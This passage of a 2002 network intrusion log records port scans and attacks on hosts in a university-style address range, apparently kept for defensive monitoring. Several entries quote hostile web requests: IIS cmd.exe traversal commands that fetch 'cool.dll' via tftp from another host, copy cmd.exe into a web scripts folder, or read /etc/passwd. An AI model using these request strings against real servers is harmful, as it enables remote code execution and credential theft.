ports 445 2002/10/20-10:10:09.34 24.184.80.222 () scannet for ports 139 445 2002/10/20-10:12:11.57 128.248.230.137() scannet for ports 445 2002/10/20-10:19:45.27 24.191.180.161 () scannet for ports 445 2002/10/20-10:27:00.25 208.62.70.14 () scannet for ports 445 2002/10/20-11:27:11.15 61.218.152.35 () scannet for ports 80 2002/10/20-11:53:19.25 130.239.128.248() scannet for ports 445 139 2002/10/20-12:06:33.89 207.50.60.14 () scannet for ports 445 139 2002/10/20-12:23:33.70 207.50.60.14 () scannet for ports 445 139 2002/10/20-13:10:40.20 24.222.29.247 () scannet for ports 445 139 80 2002/10/20-13:26:10.30 217.97.29.40 () scannet for ports 443 2002/10/20-13:29:31.98 65.28.210.166 () scannet for ports 80 57 21 others 2002/10/20-13:46:16.27 211.193.137.154() scannet for ports 139 445 2002/10/20-13:49:33.90 211.193.137.154() scannet for ports 445 2002/10/20-14:13:05.85 155.230.13.180 () scannet for ports 445 2002/10/20-14:35:51.15 68.59.150.222 () scannet for ports 445 2002/10/20-14:49:57.21 24.185.213.166 () scannet for ports 445 2002/10/20-16:35:06.07 68.97.11.144 () scannet for ports 1433 2002/10/20-17:05:25.40 217.85.145.73 () scannet for ports 80 2002/10/20-17:08:56.56 24.163.10.223 () scannet for ports 445 139 2002/10/20-17:38:47.63 24.188.217.8 () scannet for ports 445 139 2002/10/20-17:40:02.55 144.136.76.111 () scannet for ports 445 2002/10/20-17:41:33.99 24.188.217.8 () scannet for ports 445 139 2002/10/20-17:47:48.32 211.190.19.186 () scannet for ports 445 2002/10/20-18:58:45.92 24.192.11.238 () scannet for ports 445 2002/10/20-19:19:10.43 142.103.37.105 () scannet for ports 139 445 2002/10/20-19:54:53.38 24.208.183.228 () scannet for ports 7 ports 2002/10/20-20:11:32.46 218.234.87.199 () scannet for ports 445 139 2002/10/20-20:28:14.14 204.32.70.6 () scannet for ports 445 2002/10/20-20:36:16.25 218.237.73.45 () scannet for ports 445 139 2002/10/20-20:40:54.66 24.188.191.23 () scannet for ports 139 445 2002/10/20-20:46:52.83 211.248.178.178() scannet for ports 445 2002/10/20-20:50:47.66 218.234.40.3 () scannet for ports 445 2002/10/20-21:06:22.04 24.163.171.37 () scannet for ports 445 2002/10/20-21:09:35.91 211.190.120.54 () scannet for ports 445 139 2002/10/20-21:10:02.81 211.49.150.103 () scannet for ports 139 445 2002/10/20-21:13:34.18 147.46.26.83 () scannet for ports 445 2002/10/20-21:25:15.29 165.194.27.166 () scannet for ports 445 2002/10/20-21:26:38.40 211.248.183.216() scannet for ports 445 2002/10/20-21:28:15.70 211.208.196.43 () scannet for ports 445 2002/10/20-21:34:54.45 65.138.7.185 () scannet for ports 139 2002/10/20-21:44:57.98 68.5.97.180 () scannet for ports 445 2002/10/20-21:51:13.77 211.49.137.213 () scannet for ports 445 2002/10/20-21:55:23.43 142.173.46.33 () scannet for ports 445 2002/10/20-22:05:15.54 165.95.42.133 () scannet for ports 445 2002/10/20-22:05:15.54 211.193.153.250() scannet for ports 445 139 2002/10/20-22:14:37.25 24.191.228.60 () scannet for ports 445 2002/10/20-22:31:15.37 210.221.101.251() scannet for ports 445 139 2002/10/20-22:39:06.73 143.248.10.189 () scannet for ports 445 139 2002/10/20-23:04:42.17 209.174.31.248 () scannet for ports 445 139 2002/10/20-23:15:17.88 211.186.188.97 () scannet for ports 445 2002/10/20-23:15:47.79 210.117.89.244 () scannet for ports 445 2002/10/20-23:23:59.78 24.192.127.198 () scannet for ports 445 2002/10/20-23:30:41.03 211.53.110.194 () scannet for ports 445 2002/10/20-23:40:03.39 61.252.18.45 () scannet for ports 445 139 2002/10/20-23:48:00.93 24.192.86.168 () scannet for ports 445 2002/10/20-23:52:30.21 211.207.188.49 () scannet for ports 445 2002/10/21-00:01:30.12 210.117.109.181() scannet for ports 445 2002/10/21-00:25:19.44 4.60.100.44 () scannet for ports 445 2002/10/21-00:35:36.06 211.208.160.172() scannet for ports 445 2002/10/21-00:47:37.32 4.60.92.72 () scannet for ports 445 2002/10/21-01:05:31.77 24.117.19.178 () scannet for ports 139 445 2002/10/21-01:08:00.43 144.136.95.251 () scannet for ports 445 2002/10/21-01:11:22.72 128.227.205.18 () scannet for ports multiple ports 2002/10/21-01:36:48.96 24.208.178.53 () scannet for ports 41 ports 2002/10/21-01:52:45.46 164.100.223.111() scannet for ports 139 2002/10/21-01:52:59.14 61.252.234.180 () scannet for ports 445 2002/10/21-02:01:33.71 143.248.201.129() scannet for ports 445 139 2002/10/21-02:15:07.40 211.208.69.144 () scannet for ports 139 445 2002/10/21-02:48:02.57 131.128.147.78 () scannet for ports 445 2002/10/21-02:48:10.83 203.249.133.78 () scannet for ports 445 2002/10/21-02:58:14.45 24.186.116.234 () scannet for ports 445 2002/10/21-03:00:28.42 211.192.166.40 () scannet for ports 139 445 2002/10/21-03:02:30.57 211.192.166.90 () scannet for ports 139 445 2002/10/21-03:06:58.49 129.94.163.57 () scannet for ports 445 139 2002/10/21-03:11:22.37 166.104.50.35 () scannet for ports 445 139 2002/10/21-03:18:17.51 140.109.171.80 () scannet for ports 139 445 2002/10/21-03:21:52.17 211.186.169.93 () scannet for ports 445 2002/10/21-03:24:28.42 4.60.117.24 () scannet for ports 445 2002/10/21-03:30:12.02 143.248.148.184() scannet for ports 445 2002/10/21-03:32:17.39 211.190.42.202 () scannet for ports 445 139 2002/10/21-03:32:37.88 68.5.110.152 () scannet for ports 445 2002/10/21-03:36:26.18 210.221.166.47 () scannet for ports 139 445 2002/10/21-04:01:01.85 211.208.209.223() scannet for ports 139 445 2002/10/21-04:25:39.30 61.252.141.72 () scannet for ports 445 139 2002/10/21-06:15:44.19 66.56.1.248 () scannet for ports 445 2002/10/21-06:52:27.37 68.42.23.253 () scannet for ports 445 80 2002/10/21-07:13:44.86 211.183.1.91 () scannet for ports 445 2002/10/21-11:15:25.66 198.78.64.39 () scannet for port 1433 2002/10/21-13:01:46.10 213.121.14.87 () scannet for port 80 2002/10/21-14:53:53.65 141.157.218.164 () scannet for port 80 8080 1080 3128 2002/10/21-14:56:17.26 218.49.203.26 () scannet for port 445 2002/10/21-14:58:01.36 128.59.242.237 () scannet for port 445 2002/10/21-15:36:00.71 24.127.49.158 () scannet for port 80 445 2002/10/21-15:47:59.79 67.81.73.155 () scannet for port 80 445 139 2002/10/21-15:55:16.04 206.190.177.137 () scannet for port 139 445 80 2002/10/21-16:28:29.02 217.81.237.92 () scannet for port 1433 2002/10/21-17:12:39.83 61.76.9.250 () scannet for port 139 2002/10/21-18:56:55.55 64.48.13.175 () scannet for port 139 2002/10/21-20:42:04.87 218.4.51.134 () scannet for port 21 2002/10/21-21:10:12.09 210.94.37.123 () scannet for port 139 445 2002/10/21-21:17:12.18 210.176.225.106 () scannet for port 21 2002/10/21-22:17:39.87 218.103.18.161 () scannet for port 445 1433 2002/10/21-22:19:08.76 141.157.221.223 () scannet for port 1080 3128 80 8080 2002/10/21-23:21:34.10 156.34.221.170 () scannet for port 139 2002/10/22-02:09:46.22 63.230.214.49 () scannet for port 1433 2002/10/22-02:22:52.14 62.219.147.225 () scannet for port 445 80 139 2002/10/22-02:27:29.44 66.72.2.205 () scannet for port 80 2002/10/22-04:43:03.57 208.37.154.194 () scannet for port 139 2002/10/22-06:27:12.89 213.82.180.66 () scannet for port 443 80 2002/10/22-06:56:33.67 67.105.8.123 () scannet for port 1433 2002/10/22-07:14:01.90 67.105.8.123 () scannet for port 1433 2002/10/22-07:31:16.04 80.105.159.26 () scannet for ports 139 2002/10/22-08:01:31.40 12.33.116.39 () scannet for ports 139 2002/10/22-08:01:54.64 217.226.56.27 () scannet for ports 139 2002/10/22-08:26:57.58 195.111.64.229 () scannet for ports 139 2002/10/22-08:37:03.74 211.212.115.152 (HANARO Telecom,SEOUL,KR) attack 132.235.4.215 ports 139,445 till 09:07:53.13 2002/10/22-08:37:03.93 211.162.138.49 () scannet for ports 139 2002/10/22-08:47:29.45 211.211.118.63 (HANARO Telecom,SEOUL,KR) attack 132.235.4.215 ports 139,445 till 08:50:15.82 2002/10/22-08:48:03.74 61.255.22.250 (THRUNET-CATV-,KR) attack 132.235.4.205 ports 139,445 till 10:16:10.29 2002/10/22-08:49:07.21 211.211.118.63 (HANARO Telecom,SEOUL,KR) attack 132.235.4.219 ports 139,445 till 08:54:23.18 2002/10/22-08:55:37.41 4.65.189.235 (washdc3-ar6-4-65-189-235.washdc3.dsl-verizon.net) attack 132.235.4.209 ports 139,445 till 09:16:03 2002/10/22-08:56:19.55 211.195.48.141 ((HANARO Telecom,SEOUL,KR) attack 132.235.4.22 ports 139,445 till 09:01:15.70 2002/10/22-09:00:01.08 211.208.179.180 (HANARO Telecom,SEOUL,KR) attack 132.235.4.205 ports 139,445 till 09:54:32.70 2002/10/22-09:01:23.19 217.223.145.37 (host37-145.pool217223.interbusiness.it) attack 132.235.4.213 orts 139,445 till 09:24:27.66 2002/10/22-09:04:03.23 211.196.141.226 (HANARO Telecom,SEOUL,KR) attack 1 132.235.4.201 ports 139,445 till 21:01:09.80 2002/10/22-09:07:05.38 61.248.224.244 (Onse Telecom,KYONGI,KR) attack 132.235.4.222 ports 139,445 till 09:49:27.04 2002/10/22-09:11:05.72 24.232.31.112 () scannet for ports 139 2002/10/22-09:11:46.89 211.209.17.145 (HANARO Telecom,,SEOUL,KR) attack 132.235.4.214 ports 139,445 till 09:13:09.67 2002/10/22-09:22:19.05 203.228.88.202 () scannet for ports 139 2002/10/22-09:25:05.61 217.216.10.117 (cliente-217216010117.cm128.senpa.supercable.es) attack 132.235.4.68port 445 till09:34:03.51 2002/10/22-09:29:24.19 61.72.89.223 () scannet for ports 139 2002/10/22-09:31:14.19 140.116.118.32 () scannet for ports 139 2002/10/22-09:34:25.85 61.219.132.98 (61-219-132-98.HINET-IP.hinet.net) attack 132.235.4.68 ports 139,445 till 10:06:31.19 2002/10/22-09:36:21.65 61.83.199.128 (Korea Telecom,SOUL,KR) attack 132.235.4.68 ports 139,445 till 09:44:04.21 2002/10/22-09:40:58.21 24.170.152.25 (user-0cal60p.cable.mindspring.com) attack 132.235.4.212 port 139,445 till 11:24:59. 2002/10/22-09:53:05.02 212.253.74.107 () scannet for ports 139 2002/10/22-10:00:16.96 61.35.160.171 (Cable Modem Provider ,PUSON,KR) attack 132.235.4.206ports 139,445 till 10:09:36.37 2002/10/22-10:04:12.43 211.215.186.196 (HANARO Telecom,SEOUL,KR) attack 132.235.4.20 ports 139,445 2002/10/22-10:08:28.18 217.79.118.35 (Griffin Internet Contact Role,DErby,UK) attack 132.235.4.20 ports 139,445 till 11:29:34.03 2002/10/22-10:13:11.23 211.177.65.36 (HANARO Telecom,SEOUL,KR) attack 132.235.4.203 ports 139,445 till 10:16:01.61 2002/10/22-10:21:53.59 61.219.132.98 (61-219-132-98.HINET-IP.hinet.net) attack 132.235.4.207 ports 139,445 till 10:47:36.94 2002/10/22-10:30:30.62 200.151.16.150 () scannet for ports 139 2002/10/22-10:42:52.79 200.165.66.16 () scannet for ports 139 2002/10/22-10:50:54.00 200.60.199.9 () scannet for ports 139 2002/10/22-10:53:34.91 211.177.196.230 () scannet for ports 139 2002/10/22-10:57:59.38 211.254.138.35 (CCEJ-HiTEL Information Educational,SEOUL,KR) attack 132.235.4.68port 445 till 11:08:02.62 2002/10/22-11:04:15.49 200.60.196.89 () scannet for ports 139 2002/10/22-11:18:01.17 209.240.170.36 () scannet for ports 139 2002/10/22-11:22:48.72 211.198.236.49 (KOREA TELECOM KWANGJU NODE,KR) attack 132.235.4.216port 445 2002/10/22-11:24:21.59 61.104.217.242 (THRUNET-CATV-KANGNAMOWN-KR,SOUL,KR) attack 132.235.4.14 till 14:17:43.86 2002/10/22-11:27:19.49 202.88.227.123 () scannet for ports 139 2002/10/22-12:01:13.30 129.219.38.95 () scannet for ports 443 2002/10/22-12:07:29.31 200.214.140.227 () scannet for ports 139 2002/10/22-12:18:16.43 61.79.46.173 () scannet for ports 139 2002/10/22-12:20:39.42 211.91.143.38 (China United Telecommunications Corporation,BEIJING,CN) attack 132.235.4.1ports 139,445 till 13:21:35.98 2002/10/22-12:37:21.57 217.128.48.138 (APoitiers-106-1-2-138.abo.wanadoo.fr) attack 132.235.4.17 ports 139,445 till 12:59:23.73 2002/10/22-13:10:47.59 61.35.227.30 () scannet for ports 139 2002/10/22-13:14:56.95 24.101.207.209 (CPE3438373837383932.cpe.net.cable.rogers.com) attack 132.235.4.210 port 445 til 17:09:37 2002/10/22-13:39:35.62 12.98.120.48 () scannet for ports 139 2002/10/22-13:44:48.39 217.211.211.17 () scannet for ports 139 2002/10/22-13:47:26.69 168.70.219.72 () scannet for ports 139 2002/10/22-13:57:34.08 212.179.102.99 (cablep-179-102-99.cablep.bezeqint.net) attack 132.235.1.[89,90] ports 139,445 till 14:17:06.48 2002/10/22-13:58:25.35 67.33.114.37 () scannet for ports 139 2002/10/22-14:00:28.17 212.179.102.99 () scannet for ports 80 445 139 2002/10/22-14:17:31.82 61.133.74.47 (shandong price bureau,CN) attack 132.235.4.68 ports 139,445 till 17:22:14.02 2002/10/22-15:00:10.25 195.14.205.219 () scannet for ports 139 2002/10/22-15:15:43.24 217.230.208.82 () scannet for ports 80 57 2002/10/22-15:30:36.10 63.127.208.132 () scannet for ports 139 2002/10/22-15:45:00.25 212.10.126.224 () scannet for ports 139 2002/10/22-15:45:08.88 65.185.39.85 () scannet for ports 139 445 2002/10/22-15:51:22.05 212.179.102.99 () scannet for ports 139 445 80 2002/10/22-15:52:50.19 200.158.14.194 () scannet for ports 139 2002/10/22-15:53:10.46 212.179.102.99 (cablep-179-102-99.cablep.bezeqint.net) attack 132.235.1.[89,90] ports 139,445 till 16:16:09.74 2002/10/22-16:13:07.41 66.36.136.35 () scannet for ports 135 139 445 2002/10/22-17:07:20.44 24.203.112.43 () scannet for ports 139 445 80 2002/10/22-17:08:06.69 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) attack 132.235.1.89 ports 139,445 till 17:16:40.75 2002/10/22-17:08:06.69 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) attack 132.235.1.90 ports 139,445 till 17:16:40.75 2002/10/22-17:09:20.00 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) scannet ports 139 445 til 17:23:06 2002/10/22-17:11:47.21 200.148.6.83 () scannet for ports 139 2002/10/22-18:36:25.23 216.58.90.207 () scannet for ports 1433 2002/10/22-18:44:45.27 66.170.35.90 () scannet for ports 139 2002/10/22-19:49:03.05 24.207.169.204 () scannet for ports 139 2002/10/22-20:22:29.20 66.72.2.205 () scannet for ports 80 2002/10/22-21:07:42.30 208.33.152.30 () scannet for ports 139 445 2002/10/22-21:14:28.35 208.33.152.30 (user30.net125.va.sprint-hsd.net) attack 132.235.1.90 ports 139,445 till 23:16:54.99 2002/10/22-23:00:57.56 137.43.25.84 () scannet for ports 80 443 2002/10/23-01:08:19.09 67.34.4.221 () scannet for ports 139 445 2002/10/23-04:18:54.71 80.132.154.16 (p50849A10.dip.t-dialin.net) 1st of 210 different IPS connect to port 4665 on a printer. 2002/10/23-06:04:56.39 61.142.131.43 () scannet for ports 80 443 2002/10/23-07:14:44.87 158.123.212.2 () scannet for ports 80 2002/10/23-08:49:53.69 62.219.148.96 () scannet for ports 139 80 445 2002/10/23-10:12:32.53 217.96.28.107 () scannet for ports 139 2002/10/23-10:15:09.70 80.15.137.223 () scannet for ports 139 2002/10/23-10:20:12.51 200.168.76.91 () scannet for ports 139 2002/10/23-10:51:07.26 62.251.206.198 () scannet for ports 139 2002/10/23-10:53:13.87 24.78.145.84 () scannet for ports 139 2002/10/23-11:06:10.88 200.206.157.253 () scannet for ports 111 2002/10/23-11:06:40.51 203.75.12.104 () scannet for ports 139 2002/10/23-11:27:09.01 145.18.244.93 () scannet for ports 1433 2002/10/23-11:40:33.04 209.79.223.64 () scannet for ports 139 2002/10/23-11:40:40.48 66.0.15.163 () scannet for ports 139 2002/10/23-11:48:32.54 210.110.86.34 () scannet for ports 139 2002/10/23-12:28:32.85 202.69.162.13 () scannet for ports 139 2002/10/23-12:49:57.38 148.240.170.244 () scannet for ports 139 2002/10/23-12:55:01.77 218.165.168.185 () scannet for ports 139 2002/10/23-13:14:47.03 217.3.115.59 () scannet for ports 139 2002/10/23-13:19:59.50 216.241.5.137 () scannet for ports 139 2002/10/23-13:20:12.92 80.37.216.153 () scannet for ports 139 2002/10/23-13:30:42.99 200.169.83.143 () scannet for ports 139 2002/10/23-13:41:26.21 200.65.243.221 (dup-200-65-243-221.prodigy.net.mx) scannet for ports 139 2002/10/23-13:44:44.28 200.72.64.142 (notebook.topservice.d2g.com) scannet for ports 139 2002/10/23-13:53:08.60 65.81.167.186 (adsl-81-167-186.asm.bellsouth.net) scannet for ports 139 2002/10/23-14:49:03.81 66.123.173.133 (adsl-66-123-173-133.dsl.sntc01.pacbell.net) scannet for ports 139 2002/10/23-15:15:56.62 219.241.102.96 () scannet for ports 139 2002/10/23-15:28:14.00 207.178.98.85 (ppp-85-98-ks1.hubris.net) scannet for ports 139 2002/10/23-15:29:13.37 207.195.97.185 (hsdbsk207-195-97-185.sasknet.sk.ca) scannet for ports 139 2002/10/23-16:38:35.48 128.210.63.233 (testnt-33.adpc.purdue.edu) scannet for ports 1433 2002/10/23-18:53:36.70 198.86.95.94 () scannet for ports 80 2002/10/23-20:18:11.71 200.78.148.14 () scannet for ports 443 80 2002/10/23-21:15:06.57 66.189.203.228 (ts46-01-qdr996.ykma.wa.charter.com) scannet for ports 139 2002/10/23-21:50:01.02 216.123.27.102 () scannet for ports 111 2002/10/23-23:38:38.31 80.33.110.192 (192.Red-80-33-110.pooles.rima-tde.net) scannet for ports 80 2002/10/24-00:24:33.33 210.54.31.26 (p0rn5tar.net4u.co.nz) scannet for ports 139 80 445 2002/10/24-00:46:22.48 66.202.58.171 (host-66-202-58-171.ind.choiceone.net) scannet for ports 1433 2002/10/24-01:27:08.10 217.125.26.151 (217-125-26-151.uc.nombres.ttd.es) scannet for ports 80 2002/10/24-01:59:02.90 217.81.61.153 (pD9513D99.dip.t-dialin.net) attack web server w/ GET /_mem_bin/..(etc)/cmd.exe?/c+tftp%20-i%20192.168.10040%20GET%20cool.dll%20c 2002/10/24-03:20:53.36 151.200.218.99 () scannet for ports 80 2002/10/24-06:06:49.22 64.157.32.1 (dpclt032001.direcpc.com) probe 132.235.2.1 : 53 til 2002/10/25-03:16:59.67 2002/10/24-07:39:07.27 202.95.150.209 (POP SBY RADIO GATEWAY,ID) 1. attack 132.235.19.164:80 w/command 2002/10/24-07:39:07.27 202.95.150.209 (POP SBY RADIO GATEWAY,ID) 2. /cmd.exe?/c+tftp%20-i%2010.112.1.190%20GET%20cool.dll 2002/10/24-08:10:13.05 200.206.134.52 () scannet for port 139 2002/10/24-08:10:17.84 61.217.137.40 () scannet for port 139 2002/10/24-08:22:00.27 68.0.52.39 () scannet for port 139 2002/10/24-08:50:35.59 200.158.150.237 () scannet for port 139 2002/10/24-08:53:33.48 80.26.74.35 () scannet for port 139 2002/10/24-09:00:58.04 200.180.44.208 () scannet for port 139 2002/10/24-09:01:28.22 218.154.125.162 () scannet for port 139 2002/10/24-09:27:05.50 218.163.24.92 () scannet for port 139 2002/10/24-09:30:26.21 216.155.94.72 () scannet for port 139 2002/10/24-10:02:31.99 12.134.1.116 () scannet for port 139 2002/10/24-10:09:24.08 130.243.13.136 () scannet for port 1433 80 2002/10/24-10:15:54.39 200.64.236.225 () scannet for port 139 2002/10/24-10:18:28.85 212.235.36.170 (Netvision's cables service,IL) 2. etc until 1530 2002/10/24-20:32:41.95 2002/10/24-10:29:20.92 216.190.38.174 () scannet for port 139 2002/10/24-11:11:19.71 203.90.76.37 () scannet for port 139 2002/10/24-11:27:49.85 200.62.137.74 () scannet for port 139 2002/10/24-11:40:08.00 213.106.54.112 () scannet for port 139 2002/10/24-12:22:33.23 206.190.177.137 () scannet for port massive 139 445 80 2002/10/24-12:23:27.09 207.14.78.159 () scannet for port 139 2002/10/24-13:06:11.05 61.230.0.32 () scannet for port 139 2002/10/24-14:00:13.58 216.78.153.90 () scannet for port 139 2002/10/24-14:03:45.13 64.157.37.159 (dpclt037159.direcpc.com) probe 132.235.2.1 : 53 2002/10/24-14:20:39.50 212.235.36.170 (Netvision's cables service,IL) 1. attack 132.235.18.16:80 :GET /scripts/sensepost.exe?/c+echo% 2002/10/24-14:34:02.85 166.114.117.182 () scannet for port 139 2002/10/24-15:57:26.61 12.25.164.168 () scannet for port 139 445 2002/10/24-16:20:29.17 213.121.13.67 () scannet for port 139 445 2002/10/24-16:25:46.22 200.204.5.57 () scannet for port 139 2002/10/24-17:06:59.43 200.46.89.226 () scannet for port 80 2002/10/24-17:19:35.68 131.216.72.39 () scannet for port 1433 2002/10/24-17:19:50.54 217.81.121.232 () scannet for port 139 2002/10/24-18:18:17.83 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) probe several ips for port 631 til 23:57:39.29 2002/10/24-20:15:46.80 218.223.85.239 () scannet for port 139 2002/10/24-20:25:20.73 64.157.35.121 (dpclt035121.direcpc.com) probe 132.235.2.1 : 53 2002/10/24-21:26:46.14 24.130.136.167 () scannet for port 445 80 2002/10/25-01:46:12.63 210.83.142.163 () scannet for port 443 80 2002/10/25-03:47:04.65 61.63.154.25 () scannet for port 80 2002/10/25-03:59:53.55 64.157.36.35 (dpclt036035.direcpc.com) probe 132.235.2.1 : 53 2002/10/25-05:45:39.68 129.105.70.69 () scannet for port 445 139 2002/10/25-08:48:04.21 165.121.32.195 (user-2ini863.dialup.mindspring.com) scannet for ports 445 2002/10/25-09:06:11.83 210.221.25.204 (s210-221-25-204.thrunet.ne.kr) scannet for ports 445 2002/10/25-09:30:42.66 66.114.155.192 (pia155-192.pioneernet.net) scannet for ports 139 2002/10/25-09:53:40.27 211.190.19.103 () scannet for ports 445 2002/10/25-10:03:46.40 212.120.120.106 (cp282144-a.schoo1.lb.home.nl) scannet for ports 1433 2002/10/25-10:10:53.40 63.198.239.77 () scannet for ports 139 2002/10/25-10:15:34.04 61.177.57.130 (61-223-27-52.HINET-IP.hinet.net) scannet for ports 80 443 2002/10/25-10:54:04.12 211.208.175.197 () scannet for ports 445 2002/10/25-10:54:52.95 24.102.124.234 (CPE00045a9a518b.cpe.net.cable.rogers.com) scannet for ports 445 2002/10/25-11:09:32.56 220.75.240.140 () scannet for ports 139 2002/10/25-11:44:58.60 200.28.129.119 (119-129-28.dial.terra.cl) scannet for ports 139 2002/10/25-11:47:07.82 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80 2002/10/25-11:53:42.96 129.128.129.136 () red.trlabs.ualberta.cascannet for ports 1433 2002/10/25-12:10:57.44 202.142.78.163 () scannet for ports 139 2002/10/25-13:06:26.02 155.58.31.208 () scannet for ports 1433 2002/10/25-13:18:41.60 65.148.112.150 (0-1pool112-150.nas45.los-angeles2.ca.us.da.qwest.net) scannet for ports 139 2002/10/25-14:07:01.19 200.54.28.246 () scannet for ports 139 2002/10/25-14:07:26.97 212.142.147.174 (eu147-174.clientes.euskaltel.es) scannet for ports 139 2002/10/25-14:14:08.47 140.111.134.71 (serv7.waes.ilc.edu.tw) scannet for ports 139 2002/10/25-14:18:33.65 200.199.134.236 () scannet for ports 139 2002/10/25-14:23:32.28 61.223.27.52 (docs34-219.menta.net) scannet for ports 139 2002/10/25-14:28:12.47 213.97.94.136 (213-97-94-136.uc.nombres.ttd.es) scannet for ports 139 2002/10/25-15:03:42.87 192.135.11.194 (prpc94.fis.unipr.it) scannet for ports 139 2002/10/25-15:45:37.19 200.151.198.139 (SHASTA198139.ig.com.br) scannet for ports 139 2002/10/25-17:30:56.83 66.110.160.156 (adsl-66.110.160-156.globetrotter.net) scannet for ports 139 21 80 445 2002/10/25-19:08:26.31 208.221.169.2 () scannet for ports 58083 80 21 57 2002/10/25-19:09:09.16 208.221.169.2 (USA Teleport Inc.,North Miami Beach FL,US) 1. attack web server with command: 2002/10/25-19:09:09.16 208.221.169.2 (USA Teleport Inc.,North Miami Beach FL,US) 2. HEAD /cgi-bin/ssi//%2(...)2e/etc/passwd?/c+dir+c:\ 2002/10/26-01:04:43.10 137.82.16.50 () scannet for ports 1433 2002/10/26-04:38:20.85 212.194.30.116 (lns02v-7-116.w.club-internet.fr) scannet for ports 21 2002/10/26-06:06:07.39 134.214.86.172 (eur-adm.insa-lyon.fr) scannet for ports 80 443 2002/10/26-06:06:22.29 64.124.124.31 () scannet for ports 80 2002/10/26-09:39:15.25 130.94.240.218 () scannet for ports 80 2002/10/26-09:39:19.16 130.94.240.218 (Verio, Inc.,Englewood CO US) 1. attack web server w/ command: 2002/10/26-09:39:19.16 130.94.240.218 (Verio, Inc.,Englewood CO US) 2. c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe 2002/10/26-09:39:51.82 62.57.33.219 (adsl-63-198-239-77.dsl.lsan03.pacbell.net) scannet for ports 21 2002/10/26-10:18:20.36 24.214.37.14 (user-24-214-37-14.knology.net) scannet for ports 80 445 2002/10/26-13:39:23.71 24.25.185.111 (grayme-cmt1-24-25-185-111.maine.rr.com) scannet for ports 80 443 2002/10/26-16:28:16.42 211.91.218.140 () scannet for ports 8080 1080 8000 2002/10/26-17:35:58.58 24.229.29.65 (PenTeleData Inc. - Cable, PA,US) 1. attack web server w/ command: 2002/10/26-17:35:58.58 24.229.29.65 (PenTeleData Inc. - Cable, PA,US)2. c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe 2002/10/26-17:36:19.36 24.229.29.65 () scannet for ports 80 2002/10/26-18:58:52.30 211.144.103.19 () scannet for ports 21 2002/10/26-21:19:05.40 137.229.59.242 (59-242.lathrop.uaf.edu) scannet for ports 139 80 445 2002/10/26-21:55:09.39 211.21.184.148 (www.ad.com.tw) scannet for ports 80 2002/10/26-23:16:45.16 168.191.184.235 (sdn-ar-002txtempP329.dialsprint.net) scannet for ports 80 8000 8001 8080 8090 81 8888 1080 3128 4480 6588 2002/10/27-00:46:08.41 167.206.174.19 (guardian.rvcschools.org) scannet for ports 1433 2002/10/27-00:50:00.07 128.119.153.23 (peoples-market.stuaf.umass.edu) scannet for ports 1433 2002/10/27-06:50:57.12 210.71.57.129 () scannet for ports 80 443 2002/10/27-08:55:35.62 213.22.27.187 (a213-22-27-187.netcabo.pt) scannet for ports 139 2002/10/27-10:12:16.27 203.195.175.166 (203-195-175-166.now-india.net.in) scannet for ports 445 2002/10/27-10:13:14.37 203.195.159.11 (203-195-159-11.now-india.net.in) scannet for ports 80 2002/10/27-10:47:36.37 195.175.113.197 (nwusr-8644.dial-in.ttnet.net.tr) try to anon ftp /etc/passwd file. 2002/10/27-13:33:21.92 213.184.174.85 () scannet for ports 445 139 2002/10/27-15:14:13.56 81.48.34.174 (AMontsouris-107-1-2-174.abo.wanadoo.fr) scannet for ports 80 445 135 139 2002/10/27-15:21:31.60 24.208.178.53 (dhcp024-208-178-053.columbus.rr.com) scannet for ports 44 ports 2002/10/27-16:21:37.57 168.126.241.66 () scannet for ports 21 2002/10/27-17:41:17.14 68.55.241.250 (pcp313644pcs.woodln01.md.comcast.net) scannet for ports 80 2002/10/27-21:05:38.79 217.128.142.68 (ABordeaux-201-1-1-68.abo.wanadoo.fr) scannet for ports 1433 2002/10/27-21:46:58.81 141.157.219.188 (pool-141-157-219-188.ny325.east.verizon.net) scannet for ports 80 8080 1080 3128 2002/10/27-23:44:38.19 129.63.211.144 (she211-144.uml.edu) scannet for ports 80 2002/10/28-01:09:26.41 80.205.215.90 (host90-215.pool80205.interbusiness.it) scannet for ports 80 2002/10/28-01:26:36.17 203.77.19.194 (host194.2037719.gcn.net.tw) scannet for ports 80 443 2002/10/28-02:18:41.17 66.245.35.150 (user-11fa8sm.dsl.mindspring.com) scannet for ports 445 139 80 2002/10/28-04:19:44.25 172.185.221.90 (ACB9DD5A.ipt.aol.com) scannet for ports 21 80 57 2002/10/28-04:22:26.27 172.185.221.90 (ACB9DD5A.ipt.aol.com) attack web server: HEAD /cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd?/c+dir+c: 2002/10/28-05:46:16.93 211.238.207.36 () scannet for ports 111 2002/10/28-06:29:02.23 80.143.166.121 (p508FA679.dip.t-dialin.net) scannet for ports 137 139 2002/10/28-06:29:19.89 212.155.193.161 () scannet for ports 139 135 2002/10/28-06:32:41.44 213.2.155.68 (host4.tms-advertising.co.uk) scannet for ports 80 2002/10/28-07:16:48.58 151.1.141.53 () scannet for ports 80 443 2002/10/28-07:50:38.69 80.143.166.121 (p508FA679.dip.t-dialin.net) scannet for ports 80 139 445 135 2002/10/28-07:52:03.69 80.143.166.121 (p508FA679.dip.t-dialin.net) heavy attack on 132.235.1.[89,90] ports 445,135 til08:30:02.04 2002/10/28-08:15:38.65 61.149.0.116 () scannet for ports 8080 80 3128 2002/10/28-08:25:15.48 211.207.15.93 () scannet for ports 21, anon ftp attacks 2002/10/28-08:29:04.42 12.213.29.209 (12-213-29-209.client.attbi.com) scannet for ports 1433 2002/10/28-09:25:42.00 210.183.104.247 () scannet for ports 139 2002/10/28-09:26:26.62 213.201.150.210 () scannet for ports 139 2002/10/28-09:43:45.87 212.77.210.55 () scannet for ports 139 2002/10/28-09:57:35.79 209.163.98.83 (209-163-98-83.dialup.qis.net) scannet for ports 139 2002/10/28-10:29:01.54 217.144.7.85 () scannet for ports 139 2002/10/28-10:34:37.74 80.59.170.87 (87.Red-80-59-170.pooles.rima-tde.net) scannet for ports 139 2002/10/28-11:37:54.06 212.194.73.181 (lns04a-2-181.w.club-internet.fr) scannet for ports 21 2002/10/28-12:18:56.66 193.252.171.71 